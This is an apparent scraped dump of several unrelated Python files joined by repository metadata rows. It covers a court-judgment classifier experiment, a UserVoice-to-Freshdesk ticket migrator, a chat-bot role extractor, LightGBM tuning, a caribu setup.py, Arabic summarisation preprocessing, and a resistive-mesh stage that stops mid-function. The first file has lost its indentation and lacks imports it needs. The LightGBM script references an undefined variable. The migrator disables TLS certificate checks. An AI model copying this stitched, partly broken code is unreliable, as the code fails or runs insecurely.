from os import listdir, path
import copy
from pathlib import Path
import re
import pandas as pd
import numpy as np
from bidict import bidict
from scipy import sparse
from sklearn.model_selection import cross_validate, StratifiedKFold
from sklearn.preprocessing import LabelEncoder
from sklearn.preprocessing import MultiLabelBinarizer
from echr.utils.folders import make_build_folder
from echr.utils.logger import getlogger
from echr.utils.cli import TAB
from rich.markdown import Markdown
from rich.console import Console
from rich.table import Table
from rich.progress import (
Progress,
BarColumn,
TimeRemainingColumn,
)
from rich.panel import Panel
from rich.tree import Tree
from echr_experiments.config import ROUND_DIGITS, \
SEED, \
MULTICLASS_DESC_OUTPUT_FILE, \
MULTICLASS_OUTPUT_FILE, \
MULTICLASS_ARTICLES, \
MULTICLASS_FLAVORS, \
K_FOLD, \
AS_TIME_SERIES, \
MULTICLASS_CLASSIFIERS, \
DEFAULT_FEATURE_THRESHOLD
from echr_experiments.format import format_filter_output, format_method_output
from echr_experiments.data import load_ECHR_instance, generate_datasets_descriptors
from echr_experiments.scorers import make_scorers, process_score, calculate_average_cm
from echr_experiments.utils import update_classifier_result, \
update_dataset_filter_result, \
update_dataset_metadata, \
update_dataset_result, \
update_article_desc
seed = SEED
result_file = MULTICLASS_OUTPUT_FILE
articles = MULTICLASS_ARTICLES
flavors = MULTICLASS_FLAVORS
k_fold = K_FOLD
as_time_series = AS_TIME_SERIES
feature_threshold = DEFAULT_FEATURE_THRESHOLD
classifiers = MULTICLASS_CLASSIFIERS
import warnings
from pandas.core.common import SettingWithCopyWarning
warnings.simplefilter(action="ignore", category=SettingWithCopyWarning)
log = getlogger()
def generate_outcomes_data(y_file, outcome_to_id, filter_threshold=100):
# Generate hot-one outcome matrix
with open(y_file) as file:
f = lambda x: {x.split(':')[0]:x.split(':')[1]}
outcomes = file.readlines()
outcomes = pd.DataFrame(outcomes)
outcomes[0] = outcomes[0].apply(lambda x: x.strip().split())
outcomes['caseid'] = outcomes[0].apply(lambda x: x[0])
outcomes[0] = outcomes[0].apply(lambda x: x[1])
return outcomes
def map_outcome(art, x):
if x[f'{art}:1'] == 1:
return 1
elif x[f'{art}:0'] == 1:
return 0
else:
return -1
def load_dataset(X_file, min_threshold=0):
with open(X_file) as file:
f = lambda x: {x.split(':')[0]:x.split(':')[1]}
X = file.readlines()
X = pd.DataFrame(X)
X[0] = X[0].apply(lambda x: sorted(x.strip().split()))
#X['caseid'] = X[0].apply(lambda x: x[0])
#X[0] = X[0].apply(lambda x: x[1:])
# Generate hot-one outcome matrix
mlb = MultiLabelBinarizer(sparse_output=True)
X = X.join(
pd.DataFrame.sparse.from_spmatrix(
mlb.fit_transform(X.pop(0)),
index=X.index,
columns=mlb.classes_))
return X
def run(console, build, force):
__console = console
global print
print = __console.print
outcomes_path = 'data/input/datasets/'
raw_outcome_file = Path(outcomes_path) / 'outcomes.txt'
outcome_matrix_file = Path(outcomes_path) / 'outcomes_matrix.csv'
print(Markdown("- **Prepare outcome matrix**"))
OUTCOME_TO_ID = 'data/input/datasets/outcomes_variables.json'
with open(OUTCOME_TO_ID, 'r') as f:
outcome_to_id = json.load(f)
if True: #not os.path.isfile(outcome_matrix_file) or force:
print(TAB + '> Generate the outcome matrix [green][DONE]')
outcomes_matrix = generate_outcomes_data(raw_outcome_file, outcome_to_id, filter_threshold=100)
outcomes_matrix.to_csv(outcome_matrix_file)
else:
print(TAB + '> Load the outcome matrix [green][DONE]')
outcome_matrix = pd.read_csv(outcome_matrix_file)
# Class encoding
le = LabelEncoder()
le.fit(outcomes_matrix[0])
mapping_class = dict(zip(le.classes_, le.transform(le.classes_)))
outcomes_matrix['decision'] = le.transform(outcomes_matrix[0])
outcomes_matrix['article'] = outcomes_matrix[0].apply(lambda x: x.split(':')[0])
CM = [] # Confusion matrices
count = outcomes_matrix['article'].value_counts()
count = json.loads(count.to_json())
count = {k:v for k,v in count.items() if v > 100}
articles_to_keep = list(count.keys())
outcomes_matrix = outcomes_matrix[outcomes_matrix['article'].isin(articles_to_keep)]
le = LabelEncoder()
le.fit(outcomes_matrix[0])
mapping_class = dict(zip(le.classes_, le.transform(le.classes_)))
c_outcomes = bidict(outcome_to_id)
metadata = json.loads(outcomes_matrix['article'].value_counts().to_json())
metadata = {k:{'Size': v, 'Article': c_outcomes.inverse[int(k)] } for k,v in metadata.items()} # c_outcomes.inverse[int(k)]
for art, mdata in metadata.items():
mdata['Violation'] = outcomes_matrix[outcomes_matrix[0] == f'{art}:1'].shape[0]
mdata['No-Violation'] = outcomes_matrix[outcomes_matrix[0] == f'{art}:0'].shape[0]
mdata['Prevalence'] = mdata['Violation'] / (mdata['Violation'] + mdata['No-Violation'])
update_article_desc('Multiclass', metadata, MULTICLASS_DESC_OUTPUT_FILE)
print(TAB + '> Update dataset description [green][DONE]')
print(Markdown("- **Experiment summary**"))
FLAVORS = {'Descriptive only': 'descriptive.txt', 'Bag-of-Words only': 'BoW.txt', 'Descriptive and Bag-of-Words': 'descriptive+BoW.txt'}
print(f" | Flavors: {len(FLAVORS)}")
print(f" | Methods: {len(classifiers)}")
print(f" = {len(FLAVORS) * len(classifiers)} cross-validation procedures")
print(f" = Take some :coffee: or :tea: and relax")
try:
f = open (result_file, "r")
exp_results = json.loads(f.read())
print(TAB + '> Load existing results [green][DONE]')
except Exception as e:
exp_results = {}
print(TAB + '> No previous results [green][DONE]')
table = Table(title="Cross-Validation Summary")
table.add_column("Flavor", style="cyan", no_wrap=True)
table.add_column("Method", justify="right", style="blue")
table.add_column("Status", justify="right", style="green")
for i, flavor in enumerate(FLAVORS.keys()):
for k, method in enumerate(classifiers.keys()):
dataset_name = f'Multiclass - {flavor}'
status = exp_results.get(dataset_name, {}).get('methods', {}).get(method, None)
status = '[green]DONE' if status else None
table.add_row(flavor if k == 0 else None, method, status)
print(table)
for flavor, features_file in FLAVORS.items():
print(Panel(f'[bold yellow] Cross-Validation Flavor {flavor.upper()}'), justify="center")
print(Markdown("- **Prepare dataset**"))
dataset_path = Path(outcomes_path) / features_file
X = load_dataset(dataset_path)
X = pd.DataFrame(X)
X = X[X.index.isin(outcomes_matrix.index)]
print(TAB + '> Load the dataset [green][DONE]')
if flavor != 'Bag-of-Words':
# Remove '0:'
to_drop = [e for e in X.columns if e.startswith('0:')]
X.drop(columns=to_drop, inplace=True)
print(TAB + '> Drop unecessary columns [green][DONE]')
print(Markdown(f"- **Cross-Validate**"))
y = outcomes_matrix['decision']
o = {'name': f'Multiclass - {flavor}'}
dataset_name = o['name']
if dataset_name not in exp_results:
exp_results[dataset_name] = {}
#format_filter_output(dataset_name, o)
update_dataset_result(dataset_name, o, result_file)
update_dataset_filter_result(dataset_name, o, result_file)
metadata = exp_results.get(dataset_name, {}).get('filter', {})
metadata['size'] = metadata.get('size', int(y.shape[0]))
#metadata['violation'] = metadata.get('violation', int(y_art.sum()))
#metadata['non_violation'] = metadata['size'] - metadata['violation']
#metadata['prevalence'] = float(metadata['violation']) / metadata['size']
update_dataset_metadata(dataset_name, metadata, result_file)
print(TAB + '> Generate dataset metadata [green][DONE]')
#if flavor == 'Descriptive only':
# update_article_desc(art, metadata, MULTICLASS_DESC_OUTPUT_FILE)
# print(TAB + '> Update dataset description [green][DONE]')
CM = []
for classifier_name, classifier in classifiers.items():
print(TAB + f'> [bold]{classifier_name}')
if exp_results.get(dataset_name, {}).get('methods', {}).get(classifier_name, None):
print(TAB + ' тоб Cross-Validation results already exist. [green][SKIP]')
else:
try:
scoring = make_scorers(multiclass=True, CM=CM)
cv = TimeSeriesSplit(n_splits=k_fold) if as_time_series \
else StratifiedKFold(n_splits=k_fold) #, random_state=seed)
#scores = cross_validate(classifier, X_art.to_numpy(), y_art.to_numpy(),
scores = cross_validate(classifier, X, y,
cv=cv,
scoring=scoring,
return_train_score=True,
verbose=10,
n_jobs=None, error_score='raise')
classifier_output = process_score(scores, scoring, seed, multilabel=True)
cm = calculate_average_cm(CM, train_score=True)
classifier_output['confusion_matrix'] = cm
classifier_output['confusion_matrix']['class_labels'] = list(le.classes_) #list(outcomes_matrix[0].value_counts().index) #list(le.classes_)
#format_method_output(classifier_name, classifier_output)
update_classifier_result(
dataset_name,
classifier_name,
classifier_output,
result_file
)
pass
except Exception as e:
print(e)
def main(args):
console = Console(record=True)
run(console, args.build, args.force)
def parse_args(parser):
args = parser.parse_args()
return args
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Multiclass experiments')
parser.add_argument('--build', type=str, default="./build/echr_database/")
parser.add_argument('-f', '--force', action='store_true')
args = parse_args(parser)
main(args)
| echr-od/ECHR-OD_predictions | multiclass_experiments.py | multiclass_experiments.py | py | 11,588 | python | en | code | 7 | github-code | 1 | [
{
"api_name": "echr_experiments.config.SEED",
"line_number": 49,
"usage_type": "name"
},
{
"api_name": "echr_experiments.config.MULTICLASS_OUTPUT_FILE",
"line_number": 50,
"usage_type": "name"
},
{
"api_name": "echr_experiments.config.MULTICLASS_ARTICLES",
"line_number": 51,
... |
27559044703 | import urllib3
urllib3.disable_warnings()
import os.path
import json
import requests
import uservoice
import time
from config import *
def send_ticket_to_freshdesk(ticket, ticket_number):
_url = "https://%s.freshdesk.com/api/v2/tickets" % FD_SUBDOMAIN
_headers = {
'Content-Type': 'application/json'
}
_data = json.dumps(ticket)
time.sleep(1) # to prevent rate limit
r = requests.post(_url, data = _data, auth=(FD_API_KEY, "api"), headers=_headers, verify=False)
if r.status_code != 200 and r.status_code != 201:
print('x %s: %s' % (ticket_number, r.text))
return {}
else:
# print('✓ %s' % (ticket_number))
return r.json()
def process_uv_ticket(uv_ticket):
ticket = {}
ticket['status'] = 5
ticket['priority'] = 1
ticket['source'] = 2
ticket['email'] = uv_ticket['contact']['email']
ticket['name'] = uv_ticket['contact']['name']
description = "<b>From UserVoice:</b> <a href=\"https://%s.uservoice.com/admin/tickets/%s\">%s</a><br/>" % (
UV_SUBDOMAIN,
uv_ticket['ticket_number'],
uv_ticket['ticket_number']
)
for message in uv_ticket['messages'][::-1]:
if message['is_admin_response']:
ticket['status'] = 4
description += (
"<br/>---<br/>"
"<b>%s <%s></b><br/>"
"%s<br/>"
"<i>%s</i><br/>"
"<br/>%s<br/><br/>"
) % (
message['sender']['name'],
message['sender']['email'],
message['created_at'],
message['referrer'],
message['body'],
)
ticket['description'] = description
ticket['subject'] = uv_ticket['subject']
ticket['tags'] = ['uservoice']
send_ticket_to_freshdesk(ticket, uv_ticket['ticket_number'])
def download_uv_tickets(uv_ticket_outfile, total_records):
'''thanks https://github.com/drmarshall/zendesk_migration'''
uv_client = uservoice.Client(UV_SUBDOMAIN, UV_API_KEY, UV_API_SECRET)
base_url = "/api/v1/tickets.json?"
total_records = total_records
tickets = {}
page = 1
print("Downloading page %s" % str(page))
with open(uv_ticket_outfile, "w") as f:
while total_records > page*100:
request = base_url+"page="+str(page)+"&per_page=100"+"&type=Support+Request&state=closed"
response = uv_client.get(request)
f.write(json.dumps(response['tickets'])+"\n")
print(json.dumps(response['response_data']))
page = response['response_data']['page'] + 1
total_records = response['response_data']['total_records']
print("Downloading page %s of %s pages" % (str(page), str(total_records/100)))
def import_tickets_to_freshdesk(uv_ticket_outfile):
with open("uservoice_export.json", "r") as uservoice_export:
batch = 1
current = 0
tickets = []
total = 0
for line in uservoice_export:
ticket_batch = json.loads(line)
for ticket in ticket_batch:
tickets.append(ticket)
total += 1
for ticket in tickets:
process_uv_ticket(ticket)
current += 1
print("%s/%s" % (current, total))
if __name__ == '__main__':
uv_ticket_outfile = "uservoice_export.json"
if not os.path.isfile(uv_ticket_outfile):
download_uv_tickets(uv_ticket_outfile, total_records=60000)
import_tickets_to_freshdesk(uv_ticket_outfile)
| melalj/uservoice-to-freshdesk | main.py | main.py | py | 3,071 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "urllib3.disable_warnings",
"line_number": 2,
"usage_type": "call"
},
{
"api_name": "json.dumps",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "time.sleep",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "requests.post",
"li... |
43063771699 | from typing import TYPE_CHECKING, Optional
from nonebot import Bot
from nonebot.internal.adapter import Event
from nonebot_plugin_access_control_api.subject.model import SubjectModel
from nonebot_plugin_access_control_api.subject.manager import SubjectManager
if TYPE_CHECKING:
from nonebot.adapters.kaiheila.event import User
from nonebot.adapters.kaiheila.event import Event as KaiheilaEvent
OFFER_BY = "nonebot_plugin_access_control"
def extract_kaiheila_role(bot: Bot, event: Event, manager: SubjectManager):
if bot.type != "Kaiheila":
return
event: KaiheilaEvent
guild_id: Optional[str] = event.extra.guild_id
getattr(event, "group_id", None) or getattr(event.extra.body, "channel_id", None)
author: Optional["User"] = event.extra.author
if author is not None:
li = []
for role in sorted(author.roles):
li.append(
SubjectModel(
f"kaiheila:g{guild_id}.role_{role}", OFFER_BY, "kaiheila:guild.role"
)
)
# 添加在platform:guild:channel之前
manager.insert_before("platform:guild:channel", *li)
| bot-ssttkkl/nonebot-plugin-access-control | src/nonebot_plugin_access_control/subject/extractor/builtin/kaiheila.py | kaiheila.py | py | 1,158 | python | en | code | 30 | github-code | 1 | [
{
"api_name": "typing.TYPE_CHECKING",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "nonebot.Bot",
"line_number": 16,
"usage_type": "name"
},
{
"api_name": "nonebot.internal.adapter.Event",
"line_number": 16,
"usage_type": "name"
},
{
"api_name": "nonebo... |
17038581303 | import lightgbm as lgb
import numpy as np
import pandas as pd
from sklearn.model_selection import train_test_split
def rmsle(y_true, y_pred):
assert len(y_true) == len(y_pred)
return np.sqrt(np.mean(np.power(np.log1p(y_true + 1) - np.log1p(y_pred + 1), 2)))
def rmse(y_true, y_pred):
assert len(y_true) == len(y_pred)
return np.sqrt(np.mean(np.power(y_true - y_pred, 2)))
df = pd.read_csv('./data/feature_select_new.csv', header=0)
df_ans = pd.read_csv('./data/ans.csv', names=['ans'])
x_train, x_valid, y_train, y_valid = train_test_split(df, df_ans, test_size=0.10, random_state=7)
lgb_train = lgb.Dataset(x_train, y_train)
lgb_eval = lgb.Dataset(x_valid, y_valid,
# reference=lgb_train
)
model_param = {'lr': 0.005, 'depth': 10, 'tree': 500, 'leaf': 10, 'sample': 0.9, 'seed': 3}
params = {
'task': 'train',
'boosting_type': 'gbdt',
'objective': 'regression_l2',
'metric': {'l2', 'l1'},
'max_depth': model_param['depth'],
'num_leaves': model_param['leaf'],
'min_data_in_leaf': 20,
'learning_rate': model_param['lr'],
'feature_fraction': 1,
'bagging_fraction': model_param['sample'],
'bagging_freq': 1,
'bagging_seed': model_param['seed'],
'verbose': 0,
'min_data_in_leaf': 1,
'min_data_in_bin': 1
}
model = lgb.train(params, lgb_train, num_boost_round=5000, #tree
valid_sets=lgb_eval,
feval=rmse,
early_stopping_rounds=30,
verbose_eval=True
)
preds = model.predict(x_valid)
print(rmse(y, preds))
#
# # print("調參1:提高準確率")
# min_merror = float('Inf')
# for num_leaves in range(20, 450, 100):
# for max_depth in range(5, 16, 5):
# params['num_leaves'] = num_leaves
# params['max_depth'] = max_depth
# cv_results = lgb.cv(
# params,
# lgb_train,
# seed=42,
# nfold=3,
# early_stopping_rounds=10,
# verbose_eval=True
# )
# mean_merror = pd.Series(cv_results['l2-mean']).min()
# if mean_merror < min_merror:
# min_merror = mean_merror
# best_params['num_leaves'] = num_leaves
# best_params['max_depth'] = max_depth
# params['num_leaves'] = best_params['num_leaves']
# params['max_depth'] = best_params['max_depth']
# # overfitting
# print("調参2:降低overfit")
# for max_bin in range(1, 155, 25):
# for min_data_in_leaf in range(10, 101, 10):
# params['max_bin'] = max_bin
# params['min_data_in_leaf'] = min_data_in_leaf
#
# cv_results = lgb.cv(
# params,
# lgb_train,
# seed=42,
# nfold=3,
# early_stopping_rounds=3,
# # verbose_eval=True
# )
#
# mean_merror = pd.Series(cv_results['l2-mean']).min()
#
# if mean_merror < min_merror:
# min_merror = mean_merror
# best_params['max_bin'] = max_bin
# best_params['min_data_in_leaf'] = min_data_in_leaf
#
# params['min_data_in_leaf'] = best_params['min_data_in_leaf']
# params['max_bin'] = best_params['max_bin']
# print params
# print("調参3:降低overfit")
# for feature_fraction in [i / 10.0 for i in range(0, 11, 2)]:
# for bagging_fraction in [i / 10.0 for i in range(0, 11, 2)]:
# for bagging_freq in range(0, 50, 5):
# params['feature_fraction'] = feature_fraction
# params['bagging_fraction'] = bagging_fraction
# params['bagging_freq'] = bagging_freq
#
# cv_results = lgb.cv(
# params,
# lgb_train,
# seed=42,
# nfold=3,
# early_stopping_rounds=3,
# # verbose_eval=True
# )
#
# mean_merror = pd.Series(cv_results['l2-mean']).min()
# boost_rounds = pd.Series(cv_results['l2-mean']).argmin()
#
# if mean_merror < min_merror:
# min_merror = mean_merror
# best_params['feature_fraction'] = feature_fraction
# best_params['bagging_fraction'] = bagging_fraction
# best_params['bagging_freq'] = bagging_freq
#
# params['feature_fraction'] = best_params['feature_fraction']
# params['bagging_fraction'] = best_params['bagging_fraction']
# params['bagging_freq'] = best_params['bagging_freq']
# print params
# print("調参4:降低overfit")
# for lambda_l1 in [i / 10.0 for i in range(0, 11, 2)]:
# for lambda_l2 in [i / 10.0 for i in range(0, 11, 2)]:
# for min_split_gain in [i / 10.0 for i in range(0, 11, 2)]:
# params['lambda_l1'] = lambda_l1
# params['lambda_l2'] = lambda_l2
# params['min_split_gain'] = min_split_gain
#
# cv_results = lgb.cv(
# params,
# lgb_train,
# seed=42,
# nfold=3,
# early_stopping_rounds=3,
# # verbose_eval=True
# )
#
# mean_merror = pd.Series(cv_results['l2-mean']).min()
#
# if mean_merror < min_merror:
# min_merror = mean_merror
# best_params['lambda_l1'] = lambda_l1
# best_params['lambda_l2'] = lambda_l2
# best_params['min_split_gain'] = min_split_gain
#
# params['lambda_l1'] = best_params['lambda_l1']
# params['lambda_l2'] = best_params['lambda_l2']
# params['min_split_gain'] = best_params['min_split_gain']
#
# print(model_param)
# print(params)
| sklinl/Competition_Tunghai | lg.py | lg.py | py | 5,626 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "numpy.sqrt",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "numpy.mean",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "numpy.power",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "numpy.log1p",
"line_number": 9,
... |
4626498979 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# {# pkglts, pysetup.kwds
# format setup arguments
import os
from os import walk
from os.path import abspath, normpath, dirname
from os.path import join as pj
from setuptools import setup, find_packages
short_descr = "Python/Visualea interface to Caribu Light model"
readme = open('README.rst').read()
history = open('HISTORY.rst').read().replace('.. :changelog:', '')
# find version number in src/alinea/caribu/version.py
version = {}
with open("src/alinea/caribu/version.py") as fp:
exec(fp.read(), version)
version_caribu = version["__version__"]
data_files = []
nb = len(normpath(abspath("src/caribu_data"))) + 1
def data_rel_pth(pth):
""" Return path relative to pkg_data
"""
abs_pth = normpath(abspath(pth))
return abs_pth[nb:]
"""
for root, dnames, fnames in walk("src/caribu_data"):
for name in fnames:
data_files.append(data_rel_pth(pj(root, name)))
"""
setup_kwds = dict(
name='alinea.caribu',
version=version_caribu,
description=short_descr,
long_description=readme + '\n\n' + history,
author="Christian Fournier, Michael Chelle, Christophe Pradal ",
author_email="Christian.Fournier@supagro.inra.fr, michael.chelle@grignon.inra.fr, christophe dot pradal _at_ cirad fr ",
url='https://github.com/openalea-incubator/caribu',
license='INRA_License_agreement',
zip_safe=False,
packages=find_packages('src'),
package_dir={'': 'src'},
include_package_data=True,
package_data={},
entry_points={},
keywords='openalea, FSPM, light',
#test_suite='nose.collector',
)
# #}
# change setup_kwds below before the next pkglts tag
#setup_kwds['setup_requires'] = ['openalea.deploy']
build_prefix = pj(abspath(dirname(__file__)),"build-scons")
setup_kwds['scons_scripts'] = ['SConstruct']
setup_kwds['bin_dirs'] = {'bin': build_prefix + '/bin'}
setup_kwds['lib_dirs'] = {'lib' : build_prefix+'/lib' }
setup_kwds['inc_dirs'] = { 'include' : build_prefix+'/include' }
setup_kwds['entry_points']['wralea'] = ['alinea.caribu = alinea.caribu_wralea']
#setup_kwds['entry_points']['console_scripts'] = []
setup_kwds['package_data'][''] = ['*.can', '*.R', '*.8', '*.opt', '*.light', '*.csv', '*.png']
if ('CONDA_PREFIX' not in os.environ) and ('PREFIX' not in os.environ):
setup_kwds['namespace_packages']=['alinea'] # Never used in a conda env...
setup_kwds['setup_requires'] = ['openalea.deploy']
# do not change things below
# {# pkglts, pysetup.call
setup(**setup_kwds)
# #}
| openalea-incubator/caribu | setup.py | setup.py | py | 2,530 | python | en | code | 7 | github-code | 1 | [
{
"api_name": "os.path.normpath",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "os.path.abspath",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "os.path.normpath",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "os.path.abspath",
... |
26373489244 | import sys
from math import log, sqrt
from itertools import combinations
import json
from nltk.stem.porter import *
from nltk.stem.snowball import ArabicStemmer
from string import punctuation
punctuation += '،؛؟”0123456789“'
stopWords = open(".../arabic_stopwords.txt",encoding = "utf-8").read().splitlines()
words=" ".join(stopWords)
STOPWORDS = frozenset({ w for w in words.split() if w })
def remove_stopword(sentence):
return " ".join(w for w in sentence.split() if w not in STOPWORDS)
def snowballStemmer(word):
stemmer = ArabicStemmer()
stem=stemmer.stem(word)
return stem
def cosine_distance(a, b):
cos = 0.0
a_tfidf = a["tfidf"]
for token, tfidf in b["tfidf"].items():
if token in a_tfidf:
cos += tfidf * a_tfidf[token]
return cos
def normalize(features):
if features != {}:
x=sqrt(sum(i**2 for i in features.values()))
if x !=0:
norm = 1.0 / x
for k, v in features.items():
features[k] = v * norm
return features
def add_tfidf_to(documents):
tokens = {}
for id, doc in enumerate(documents):
tf = {}
doc["tfidf"] = {}
doc_tokens = doc.get("tokens", [])
for token in doc_tokens:
tf[token] = tf.get(token, 0) + 1
num_tokens = len(doc_tokens)
if num_tokens > 0:
for token, freq in tf.items():
tokens.setdefault(token, []).append((id, float(freq) / num_tokens))
doc_count = float(len(documents))
for token, docs in tokens.items():
idf = log(doc_count / len(docs))
for id, tf in docs:
tfidf = tf * idf
if tfidf > 0:
documents[id]["tfidf"][token] = tfidf
for doc in documents:
doc["tfidf"] = normalize(doc["tfidf"])
def choose_cluster(node, cluster_lookup, edges):
new = cluster_lookup[node]
if node in edges:
seen, num_seen = {}, {}
for target, weight in edges.get(node, []):
seen[cluster_lookup[target]] = seen.get(
cluster_lookup[target], 0.0) + weight
for k, v in seen.items():
num_seen.setdefault(v, []).append(k)
new = num_seen[max(num_seen)][0]
return new
def majorclust(graph):
cluster_lookup = dict((node, i) for i, node in enumerate(graph.nodes))
count = 0
movements = set()
finished = False
while not finished:
finished = True
for node in graph.nodes:
new = choose_cluster(node, cluster_lookup, graph.edges)
move = (node, cluster_lookup[node], new)
if new != cluster_lookup[node] and move not in movements:
movements.add(move)
cluster_lookup[node] = new
finished = False
clusters = {}
for k, v in cluster_lookup.items():
clusters.setdefault(v, []).append(k)
return clusters.values()
def get_distance_graph(documents):
class Graph(object):
def __init__(self):
self.edges = {}
def add_edge(self, n1, n2, w):
if w>=0.0:#mus added
self.edges.setdefault(n1, []).append((n2, w))
self.edges.setdefault(n2, []).append((n1, w))
graph = Graph()
doc_ids = range(len(documents))
graph.nodes = set(doc_ids)
for a, b in combinations(doc_ids, 2):
graph.add_edge(a, b, cosine_distance(documents[a], documents[b]))
return graph
def get_documents(string,ii):
import sumy
from sumy.parsers.plaintext import PlaintextParser
from sumy.nlp.tokenizers import Tokenizer
LANGUAGE="arabic"
parser= PlaintextParser(string, Tokenizer(LANGUAGE)).document.sentences
raw={}
for s_no, sent in enumerate(parser):
raw[s_no]=str(sent)
with open(".../raw"+str(ii)+".json", "w",encoding = "utf-8") as write_file:
json.dump(raw, write_file)
write_file.close()
li=[]
for i in parser:
i=str(i)
line = ''.join(c for c in i if c not in punctuation)
line= remove_stopword(line)
line=line.split()
line=[ snowballStemmer(word) for word in line]#SnowballStemmerx
li.append(line)
docs=li
return [{"s_id":s_id,"text": " ".join(text), "tokens": text} for s_id, text in enumerate(docs)]
'''Main program ...............................'''
def main(args):
data_x={}
for ii in range(1,154):
r_text=open(".../document"+str(ii)+".txt",'r', encoding='utf-8').read()
documents = get_documents(r_text,ii)
add_tfidf_to(documents)
senID={}
for i in documents:
senID[i['s_id']]=i['tfidf']
with open(".../tfidf"+str(ii)+".json", "w",encoding = "utf-8") as write_file:
json.dump(senID, write_file)
write_file.close()
dist_graph = get_distance_graph(documents)
edges=dist_graph.edges
s={}
for k,result in list(edges.items()):
result.sort(key=lambda x: x[1])
result.reverse()
dn=[]
for i in result:
if i[1] != 0.0:
dn.append(i)
ldn=len(dn)
s[int(k)]=(result,ldn/len(documents))
with open(".../nearest"+str(ii)+".json", "w",encoding = "utf-8") as write_file:
json.dump(s, write_file)
write_file.close()
print("The end......(",ii,")")
if __name__ == '__main__':
main(sys.argv)
| DrMustafa/GOA-Arabic-Text-Summarization | data_preprocessing.py | data_preprocessing.py | py | 5,696 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "string.punctuation",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "nltk.stem.snowball.ArabicStemmer",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "math.sqrt",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "math.log... |
31865151145 | import numpy as np
import matplotlib.pyplot as plt
import copy
from run_stages.common_run_stage import CommonRunStage
from configuration.configuration_manager import Configuration
from configuration.models import Models
from utilities.image_processing_utilities import int_sq
class ResistiveMeshStage(CommonRunStage):
"""
This class implements the logic for the resistive mesh stage while abiding by the structure required by the
common run stage
"""
def __init__(self, *args):
super().__init__(*args)
self.resistive_mesh = None
def __str__(self):
return "Resistive Mesh Stage"
@property
def stage_name(self):
return "resistive_mesh"
@property
def output_file_name(self):
return [Configuration().params["r_matrix_output_file"]]
def run_stage(self):
"""
This function holds the execution logic for the resistive mesh stage
:param args:
:param kwargs:
:return:
"""
self.resistive_mesh = self._build_interconnected_mesh()
# self.plot_resistive_mesh()
return self.resistive_mesh
@staticmethod
def _build_interconnected_mesh():
"""
This function is the heart of this stage.
It converts the R matrix into a symmetric interconnected mesh of resistors
:return:
"""
if Configuration().params["model"] == Models.MONOPOLAR.value:
# load the non-diagonal entries of the R matrix. The first 3 columns are coordinates
R = np.loadtxt(Configuration().params["r_matrix_input_file_non_diagonal"], delimiter=',')
# load the diagonal entries of the R matrix. The first 2 columns are coordinates
R_dia = np.loadtxt(Configuration().params["r_matrix_input_file_diagonal"], delimiter=',')
# All potentials are referenced to the return mesh of the elementary field (column 3 of R_dia)
R = R[:, 3:] - R_dia[:, 3]
# Column 2 of R_dia contains the average potential on each active electrode.
R_dia = R_dia[:, 2] - R_dia[:, 3]
np.fill_diagonal(R, R_dia)
if Configuration().params["model"] == Models.BIPOLAR.value:
# load the axially symmetric field generated by a single active electrode
dat_active = np.loadtxt(Configuration().params["r_matrix_input_file_active"], delimiter=',')
# load the axially symmetric far field generated by a single return electrode
dat_return = np.loadtxt(Configuration().params["r_matrix_input_file_return"], delimiter=',')
# load the near field generated by a single return electrode
dat_return_neighbor = np.loadtxt(Configuration().params["r_matrix_input_file_return_neighbor"], delimiter=',')
# load the coordinates of all pixels
px_pos = np.loadtxt(Configuration().params["r_matrix_input_file_px_pos"], delimiter=',')
active_r = Configuration().params["active_electrode_radius"]
return_w = Configuration().params["return_width"]
px_size = Configuration().params["pixel_size"]
N_px = px_pos.shape[0]
# distance and potential from the center of an active electrode
X_act = dat_active[0,:]
V_act = dat_active[1,:]
# distance and potential from the center of a return hexagon
X_ret = dat_return[0,:]
V_ret = dat_return[1,:]
# determine the self-resistance of the active
X_idx = X_act<active_r
Rself_act = int_sq(X_act[X_idx], V_act[X_idx])
# cross-pixel resistance from the return to the active of the same pixel
Rself_ra = int_sq(X_ret[X_idx], V_ret[X_idx])
# self-resistance of an return hexagon
Rself_ret = dat_return_neighbor[0]
# cross-pixel resistance from the return to the active of the same pixel
return_r = px_size*(.5+np.tan(np.pi/6))/2
X_idx = (X_ret<=return_r)&(X_ret>return_r-return_w)
Rself_ar = int_sq(X_act[X_idx], V_act[X_idx])
# interprelate far-field entries
x_dist = px_pos[:,0].reshape((N_px, 1)) - px_pos[:,0].reshape((1, N_px))
y_dist = px_pos[:,1].reshape((N_px, 1)) - px_pos[:,1].reshape((1, N_px))
dist = np.sqrt(x_dist**2 + y_dist**2)
R_act = np.interp(dist, X_act, V_act)
R_ret = np.interp(dist, X_ret, V_ret)
# cross-pixel resistance to a return hexagon from the 3 nearest neighbor returns
neighbor1_idx = np.abs(dist - px_size)<1E-3
neighbor2_idx = np.abs(dist - 2*px_size)<1E-3
neighbor3_idx = np.abs(dist - np.sqrt(3)*px_size)<1E-3
R_ret[neighbor1_idx] = dat_return_neighbor[1]
R_ret[neighbor2_idx] = dat_return_neighbor[2]
R_ret[neighbor3_idx] = dat_return_neighbor[3]
# cross-pixel resistance between active and return
R12 = copy.deepcopy(R_act)
R21 = copy.deepcopy(R_ret)
np.fill_diagonal(R12, Rself_ar*np.ones(N_px))
np.fill_diagonal(R21, Rself_ra*np.ones(N_px))
np.fill_diagonal(R_act, Rself_act*np.ones(N_px))
np.fill_diagonal(R_ret, Rself_ret*np.ones(N_px))
# 2Nx2N impedance matrix
R = np.concatenate((np.concatenate((R_act, R12)), np.concatenate((R21, R_ret))), axis=1)
# force symmetry
R = (R + R.T) / 2
# convert the impedance matrix to resistor mesh. see [Z.C. Chen, et al, 2022] for the theory.
G = np.linalg.inv(R)
S = - G
np.fill_diagonal(S, G.sum(axis=1))
